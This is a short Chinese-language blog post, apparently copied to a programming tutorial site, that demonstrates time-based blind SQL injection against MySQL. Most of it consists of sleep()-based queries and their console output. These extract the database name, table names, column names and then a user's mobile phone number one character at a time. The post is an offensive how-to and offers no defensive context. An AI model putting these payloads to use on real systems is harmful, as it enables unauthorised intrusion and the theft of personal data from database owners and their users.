mysql基於「時間」的盲注

時間  2019-12-13
標籤 mysql 基於 時間 欄目 MySQL 简体版
原文   原文鏈接

無需頁面報錯,根據頁面響應時間作判斷!mysql

mysql基於時間的盲注
======================================================================================================================================================================
*	猜解庫名
	-	下面是猜解正確
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                             
		+----------+
		| sleep(1) |
		+----------+
		|        0 |
		+----------+
		1 row in set (1.00 sec)

	-	下面是猜解錯誤
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
		Empty set (0.00 sec)


*	猜解表名
	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='f';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='x';
			Empty set (0.00 sec)


*	猜解字段名
	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 1, 1)='i';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.01 sec)

	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 2, 1)='d';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)


*	猜解字段值
	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';
			

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程